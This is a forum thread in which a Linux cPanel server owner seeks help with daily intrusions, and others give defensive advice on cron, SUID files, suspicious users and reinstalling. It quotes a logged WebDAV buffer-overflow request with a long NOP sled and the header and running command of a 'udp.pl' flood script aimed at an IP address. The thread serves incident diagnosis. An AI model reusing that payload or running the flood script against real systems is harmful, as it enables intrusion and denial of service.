Server Attack...every day, help:(
Hello,
every day somebody attack my server and put some files in my /var/tmp and /tmp/ directory and execute (on my serevr I have cPanel/WHM), I search in logs (usr/local/apache/domlogs and var/log) how he do that but I can`t find, only what I find today in domlogs is this code, what is this and can he do that with this code, how I can protect my server if he do that with this code: 66.79.55.12 - - [16/Jul/2004:07:26:54 +0200] "SEARCH /\x90\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x b1\x02\xb1\x02\xb1\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x . . etc. etc. etc. much more...and at end of this code is this: 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 354 "-" "-" Please somebody help me...this is big problem for me. Thanks! |
the best thing you can do is backup your important config files, webpages format and reinstall the OS.
Read through the security refs on this forum to harden your os. ensure you connect your system to the net only after it is properly patched up, the firewall has opened only the ports that you need for your Internet presence. |
But, I check my system with chkrootkit, rkhunter and with Panda free antivirus software and I don`t find trojans, viruses...nothing...
Some other way? Thanks |
Looks like the Apache log enty is and IIS WebDav exploit, and it's probably not related to the files in /var/tmp or /tmp. What are the files in those directories? I wouldn't go so as re-installing unless you know that you have a problem that can't be easily undone.
|
No, I don`t use IIS, on my server I use Linux/Apache....
Every day he put and execute in var/tmp files "vadimI", "f3", "sh" and some more names...I have copy of that files on my HD...that files use much CPU... Also, he create directory in var/tmp with names like "....", ".c", ".x".... But I can`t find that files in logs, how he run it, copy on that location....? |
First, you should definitely disconnect the system from the internet.
As a stickman pointed out, the buffer overflow you've posted is a common IIS WebDAV exploit and is likely un-related to the files. In fact, if the files are appearing every day, it sounds like they're being created locally by a cron job or something in the init process if your rebooting daily, so definitlely take a look at cron and cronttab. You should probably also take a look at the /etc/passwd file and see if you have any odd users and especially look for users other than root with a UID of 0. Try searching for strange SUID files (find / -perm -4000 -print) and SGID files (find / -perm -2000 -print) as well. One thing to keep in mind, is that rootkits are really only tools used primarily to hide the presence of a cracker. So it's entirely possible to crack a system and never use a rootkit at all, it just makes the job of hiding a little easier. Even if you do determine that the system has been cracked, remove the files and prevent their re-creation, you will need to re-install from trusted media. If the systems security has been compromised, it's extremely difficult to be sure that no other files are lurking somewhere else in the file system. When you re-install, look into running a file integrity IDS like tripwire, aide, samhain, etc. With one of these installed, you'll more than likely be able to determine what files have been added to the system or if any critical files have been altered, using a single command. |
I think that I find where is problem!
In "/etc/cron.daily" dir I find much files: 00-logwatch@ logrotate* rpm* 0anacron* makewhatis.cron* slocate.cron* tmpwatch* Is this normal? Do you have tmpwatch* ? When I edit that file I find this: /usr/sbin/tmpwatch 240 /tmp /usr/sbin/tmpwatch 720 /var/tmp for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do if [ -d "$d" ]; then /usr/sbin/tmpwatch -f 720 $d fi done When I search on google "tmpwatch" first result is: "tmpwatch has a local denial of service and root exploit" Is this problem? What now?:( |
The contents of cron.daily are pretty normal, except the * and @ characters after the filenames, what linux distro are you using?. Also, don't forget to check crontab as well.
Tmpwatch is a normal linux application which is used to blow away tmp files that aren't being used. For more info, checkout the tmpwatch man page. Have you looked into any of the other advice I've given? |
Today he add and run new file in var/tmp "udp.pl"!
Also, this use much CPU, when I click on "CPU/Memory/MySQL Usage" in WHM I see this: Top Process %CPU 89.0 /usr/bin/perl ./udp.pl 200.222.175.87 139 1 Here is copy of header (udp.pl): #!/usr/bin/perl ##################################################### # udp flood. # # gr33ts: meth, etech, skrilla, datawar, fr3aky, etc. # # --/odix ###################################################### Also, how he run this script for other scripts like ikonboard I see this for same user: Top Process %CPU 67.0 /usr/bin/perl ikonboard.cgi no "./ikonboard.cgi"!!! Here is crontab -e output: 2,58 * * * * /usr/local/bandmin/bandmin 0 0 * * * /usr/local/bandmin/ipaddrmap 31 5 * * * /scripts/upcp */15 * * * * /usr/local/cpanel/whostmgr/bin/dnsqueue > /dev/null 2>&1 0 6 * * * /scripts/cleanmsglog > /dev/null 2>&1 0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim callout > /dev/null 2>&1 0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim retry > /dev/null 2>&1 0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim reject > /dev/null 2>&1 0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim wait-remote_smtp > /dev/null 2>$ */5 * * * * /usr/local/cpanel/bin/dcpumon >/dev/null 2>&1 etc/passwd: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/bin/bash vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash postfix:x:89:89::/var/spool/postfix:/sbin/nologin cpanel:x:32001:32001::/usr/local/cpanel:/bin/bash mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/bash and users all "username:x:3xxxx:3xxxx::/home (xxxx is some number) find / -perm -4000 -print: /usr/bin/gpasswd /usr/bin/passwd /usr/bin/quota /usr/bin/crontab /usr/bin/lppasswd /usr/local/apache/bin/suexec /usr/local/cpanel/bin/cpwrap /usr/local/cpanel/bin/jailshell /usr/local/cpanel/cgi-sys/scgiwrap /usr/sbin/exim /usr/sbin/traceroute /usr/sbin/suexec /bin/su find: /proc/3209/fd: No such file or directory find: /proc/6268/fd: No such file or directory find: /proc/24270/fd/4: No such file or directory find: /proc/24586/fd: No such file or directory find / -perm -2000 -print: /var/cpanel/users /usr/bin/wall /usr/bin/slocate /usr/local/cpanel/3rdparty/mailman /usr/local/cpanel/3rdparty/mailman/Mailman /usr/local/cpanel/3rdparty/mailman/Mailman/Archiver /usr/local/cpanel/3rdparty/mailman/Mailman/Bouncers /usr/local/cpanel/3rdparty/mailman/Mailman/Cgi /usr/local/cpanel/3rdparty/mailman/Mailman/Handlers /usr/local/cpanel/3rdparty/mailman/Mailman/Logging /usr/local/cpanel/3rdparty/mailman/Mailman/Queue /usr/local/cpanel/3rdparty/mailman/Mailman/MTA /usr/local/cpanel/3rdparty/mailman/Mailman/Gui /usr/local/cpanel/3rdparty/mailman/Mailman/Commands /usr/local/cpanel/3rdparty/mailman/archives /usr/local/cpanel/3rdparty/mailman/archives/private /usr/local/cpanel/3rdparty/mailman/archives/private/aa_cpanel3.darkorb.net.mbox /usr/local/cpanel/3rdparty/mailman/archives/private/mailman.mbox /usr/local/cpanel/3rdparty/mailman/archives/private/mailman /usr/local/cpanel/3rdparty/mailman/archives/public /usr/local/cpanel/3rdparty/mailman/bin /usr/local/cpanel/3rdparty/mailman/cgi-bin /usr/local/cpanel/3rdparty/mailman/cgi-bin/handle_opts /usr/local/cpanel/3rdparty/mailman/cgi-bin/admin /usr/local/cpanel/3rdparty/mailman/cgi-bin/admindb /usr/local/cpanel/3rdparty/mailman/cgi-bin/edithtml /usr/local/cpanel/3rdparty/mailman/cgi-bin/subscribe /usr/local/cpanel/3rdparty/mailman/cgi-bin/listinfo /usr/local/cpanel/3rdparty/mailman/cgi-bin/options /usr/local/cpanel/3rdparty/mailman/cgi-bin/private /usr/local/cpanel/3rdparty/mailman/cgi-bin/roster /usr/local/cpanel/3rdparty/mailman/cgi-bin/confirm /usr/local/cpanel/3rdparty/mailman/cgi-bin/rmlist /usr/local/cpanel/3rdparty/mailman/cron /usr/local/cpanel/3rdparty/mailman/data /usr/local/cpanel/3rdparty/mailman/filters /usr/local/cpanel/3rdparty/mailman/icons /usr/local/cpanel/3rdparty/mailman/lists /usr/local/cpanel/3rdparty/mailman/lists/mailman /usr/local/cpanel/3rdparty/mailman/locks /usr/local/cpanel/3rdparty/mailman/logs /usr/local/cpanel/3rdparty/mailman/mail /usr/local/cpanel/3rdparty/mailman/mail/mailman /usr/local/cpanel/3rdparty/mailman/qfiles /usr/local/cpanel/3rdparty/mailman/qfiles/virgin /usr/local/cpanel/3rdparty/mailman/qfiles/bounces /usr/local/cpanel/3rdparty/mailman/qfiles/shunt /usr/local/cpanel/3rdparty/mailman/qfiles/commands /usr/local/cpanel/3rdparty/mailman/qfiles/archive /usr/local/cpanel/3rdparty/mailman/qfiles/in /usr/local/cpanel/3rdparty/mailman/qfiles/out /usr/local/cpanel/3rdparty/mailman/qfiles/news /usr/local/cpanel/3rdparty/mailman/qfiles/retry /usr/local/cpanel/3rdparty/mailman/scripts /usr/local/cpanel/3rdparty/mailman/spam /usr/local/cpanel/3rdparty/mailman/templates /usr/local/cpanel/3rdparty/mailman/templates/big5 /usr/local/cpanel/3rdparty/mailman/templates/cs /usr/local/cpanel/3rdparty/mailman/templates/de /usr/local/cpanel/3rdparty/mailman/templates/en /usr/local/cpanel/3rdparty/mailman/templates/es /usr/local/cpanel/3rdparty/mailman/templates/et /usr/local/cpanel/3rdparty/mailman/templates/eu /usr/local/cpanel/3rdparty/mailman/templates/fi /usr/local/cpanel/3rdparty/mailman/templates/fr /usr/local/cpanel/3rdparty/mailman/templates/gb /usr/local/cpanel/3rdparty/mailman/templates/hu /usr/local/cpanel/3rdparty/mailman/templates/it /usr/local/cpanel/3rdparty/mailman/templates/ja /usr/local/cpanel/3rdparty/mailman/templates/ko /usr/local/cpanel/3rdparty/mailman/templates/lt /usr/local/cpanel/3rdparty/mailman/templates/nl /usr/local/cpanel/3rdparty/mailman/templates/no /usr/local/cpanel/3rdparty/mailman/templates/pl /usr/local/cpanel/3rdparty/mailman/templates/pt /usr/local/cpanel/3rdparty/mailman/templates/pt_BR /usr/local/cpanel/3rdparty/mailman/templates/ru /usr/local/cpanel/3rdparty/mailman/templates/sr /usr/local/cpanel/3rdparty/mailman/templates/sv /usr/local/cpanel/3rdparty/mailman/templates/uk /usr/local/cpanel/3rdparty/mailman/templates/ca /usr/local/cpanel/3rdparty/mailman/templates/hr /usr/local/cpanel/3rdparty/mailman/templates/ro /usr/local/cpanel/3rdparty/mailman/templates/sl /usr/local/cpanel/3rdparty/mailman/templates/tr /usr/local/cpanel/3rdparty/mailman/pythonlib /usr/local/cpanel/3rdparty/mailman/pythonlib/email /usr/local/cpanel/3rdparty/mailman/pythonlib/japanese /usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/python /usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/c /usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/mappings /usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/aliases /usr/local/cpanel/3rdparty/mailman/pythonlib/lib /usr/local/cpanel/3rdparty/mailman/pythonlib/lib/python2.2 /usr/local/cpanel/3rdparty/mailman/pythonlib/lib/python2.2/site-packages /usr/local/cpanel/3rdparty/mailman/pythonlib/korean /usr/local/cpanel/3rdparty/mailman/pythonlib/korean/mappings /usr/local/cpanel/3rdparty/mailman/pythonlib/korean/c /usr/local/cpanel/3rdparty/mailman/pythonlib/korean/python /usr/local/cpanel/3rdparty/mailman/messages /usr/local/cpanel/3rdparty/mailman/messages/cs /usr/local/cpanel/3rdparty/mailman/messages/cs/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/da /usr/local/cpanel/3rdparty/mailman/messages/da/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/de /usr/local/cpanel/3rdparty/mailman/messages/de/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/es /usr/local/cpanel/3rdparty/mailman/messages/es/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/et /usr/local/cpanel/3rdparty/mailman/messages/et/LC_MESSAGES /usr/local/cpanel/3rdparty/mailman/messages/eu /usr/local/cpanel/3rdparty/mailman/messages/eu/LC_MESSAGES 